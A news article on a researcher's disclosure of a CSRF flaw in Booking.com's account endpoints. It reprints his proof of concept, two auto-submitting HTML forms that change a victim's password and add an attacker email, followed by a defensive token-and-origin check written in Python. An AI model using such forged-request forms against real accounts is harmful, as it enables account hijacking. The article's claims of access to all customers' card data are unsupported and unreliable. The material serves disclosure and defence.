Booking.com vulnerable to CSRF Attack leading to account hijack and stealing of customer details

Booking.com vulnerable to CSRF attack

Mohamed M. Fouad, an independent security researcher from Egypt, has discovered serious flaws in the Amsterdam, Netherlands based accommodation booking provider Booking.Com. Mohamed, who has a proven track record in the field of security research and vulnerability pentesting, has been acknowledged by top tech firms like Microsoft, Oracle, Yahoo, eBay, Sony, AT&T, Huawei, DropCam, Bitcasa, Get Pocket, Splitwise etc.

Mohamed, while researching the Booking.Com website, found that it is vulnerable to a CSRF attack which can lead to account hijacking by changing the victim's password. A potential hacker can also view the email ids or credit card/debit card information of all booking.com customers. The hacker can also mark the potential victim's account for deletion.

Mohamed says all this can be done via a single one-click malicious URL. The CSRF attack can also be mounted by adding a review/comment on the Booking.Com website. If an attacker posts his/her rating review on Booking.Com containing a malicious URL, the hacker can then change victims' account passwords, and in this way he can deface the entire Booking.com website, but not before stealing all the personal information and payment card details from it.

About Booking.Com

Booking.com is an online booking website established in 1996, based in Amsterdam, Netherlands and since 2005 owned and operated by NASDAQ-listed Priceline. Booking.com offers online accommodation booking. It has over 540,000 properties globally under contract and deals with more than 650,000 room night reservations per day. Booking.com is available in more than 41 languages. Priceline, the holding company, has reported 2013 fourth quarter revenue of $1.54 billion. It increased its accommodation bookings for the quarter by 38.8% to $9.1 billion and was particularly helped by the company's international operations, which saw bookings increase 41.9% to $1.3 billion.

What is CSRF vulnerability

Cross-site request forgery, or CSRF (aka sea-surf or XSRF, also known as a one-click attack or session riding), is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser: the browser attaches the victim's session cookies to a request the attacker's page triggers, so the server cannot tell a forged request from a genuine one unless the request carries something the attacker cannot predict. Mohamed has said that the one-click bait works on Booking.Com quite well and the security team of Booking.com seems to be oblivious to the fact.

Proof of Concept (PoC)

Mohamed has given the entire PoC on his website; it is reprinted here with his approval.

Note: You will see here that each request to do something in booking.com depends on the "op" parameter with an action name value (ex: changepw, add_email, delete_account), without any token existing. Booking.com has a lot of vulnerabilities but the most critical one is that you can change a user's password via a CSRF attack.

Below is the Critical one !!!!

=============================
Change Password CSRF Request :
==============================
<html>
<body onload="document.csrf.submit()">
<form action="https://secure.booking.com/login.en-us.html?aid=304142;sid=84a359da3688960a9a914a5198ce9929;dcid=2;tmpl=profile/myaccount"
method="post" name="csrf">
<input type="hidden" name="op" value="changepw"><br>
<input type="hidden" name="lang" value="en-us"><br>
<input type="hidden" name="username" value=""><br>
<input type="hidden" name="reset_hash" value=""><br>
<input type="hidden" name="error_url" value=""><br>
<input type="hidden" name="password" value="hacked@2014"><br>
<input type="hidden" name="password_confirm" value="hacked@2014"><br>
</form>
</body>
</html>
==============================
Add Email CSRF Request :
================================
<html>
<body onload="document.csrf.submit()">
<form action="https://secure.booking.com/login.en-us.html?aid=304142;sid=84a359da3688960a9a914a5198ce9929;dcid=2;tmpl=profile/myaccount"
method="post" name="csrf">
<input type="hidden" name="op" value="add_email"><br>
<input type="hidden" name="email" value="hacker@hotmail.com"><br>
<input type="hidden" name="lang" value="en-us"><br>
</form>
</body>
</html>
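Both forms above succeed for the reason the note and the CSRF definition give: the request contains nothing the attacker's page could not have written itself. The server-side guard below is an added example (not Booking.com's code, nor the researcher's) of the two checks such an "op"-driven endpoint needs: a session-bound token in every state-changing form, and an Origin/Referer check. SECRET_KEY, issue_csrf_token, is_request_allowed and the request dicts are constructed for illustration.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Constructed placeholder; a real deployment loads this from secret storage.
SECRET_KEY = b"constructed-server-side-secret"
SITE_ORIGIN = "https://secure.booking.com"
# The "op" values the PoC drives; each of these changes account state.
STATE_CHANGING_OPS = {"changepw", "add_email", "delete_account"}


def issue_csrf_token(session_id: str) -> str:
    """Token rendered into the site's own forms, bound to the session by HMAC.
    An attacker's page cannot read the victim's session id, so it cannot
    produce a matching token."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def is_request_allowed(session_id: str, headers: dict, form: dict):
    """Return (allowed, reason) for a POST carrying an 'op' parameter."""
    if form.get("op") not in STATE_CHANGING_OPS:
        return True, "op does not change state"
    # Check 1: browsers send Origin (older ones only Referer) on a
    # cross-site form post, so a page hosted elsewhere is rejected here.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin or Referer header"
    parsed = urlparse(source)
    if f"{parsed.scheme}://{parsed.netloc}" != SITE_ORIGIN:
        return False, f"cross-site source {parsed.netloc}"
    # Check 2: the form must carry the token issued for this session;
    # constant-time comparison avoids leaking the token byte by byte.
    token = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(token.encode(), expected.encode()):
        return False, "missing or invalid csrf_token"
    return True, "ok"


# Constructed request shaped like the change-password PoC: the victim's
# browser posts from the attacker's page and the form carries no token.
FORGED_HEADERS = {"Origin": "https://attacker.example"}
FORGED_FORM = {"op": "changepw", "password": "x", "password_confirm": "x"}

# Constructed genuine request: same op, posted from the site's own form,
# which rendered the session-bound token into a hidden field.
SESSION_ID = "constructed-session-id"
GENUINE_HEADERS = {"Origin": SITE_ORIGIN}
GENUINE_FORM = dict(FORGED_FORM, csrf_token=issue_csrf_token(SESSION_ID))

if __name__ == "__main__":
    print(is_request_allowed(SESSION_ID, FORGED_HEADERS, FORGED_FORM))
    print(is_request_allowed(SESSION_ID, GENUINE_HEADERS, GENUINE_FORM))
```

Either check alone stops the forms on this page; the token check also covers browsers that send no Origin or Referer at all.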

Video of the PoC

Booking.Com reaction

Mohamed informed Booking.Com of the vulnerability present on their website, but surprisingly they have not replied to him as of yet. We are awaiting Booking.Com's reply regarding this vulnerability, which can put the data of its millions of customers at risk.

Resource: Mohamed M. Fouad's Blog

UPDATE # We received a reply from Booking.Com in which they said that their security personnel are looking into the matter.
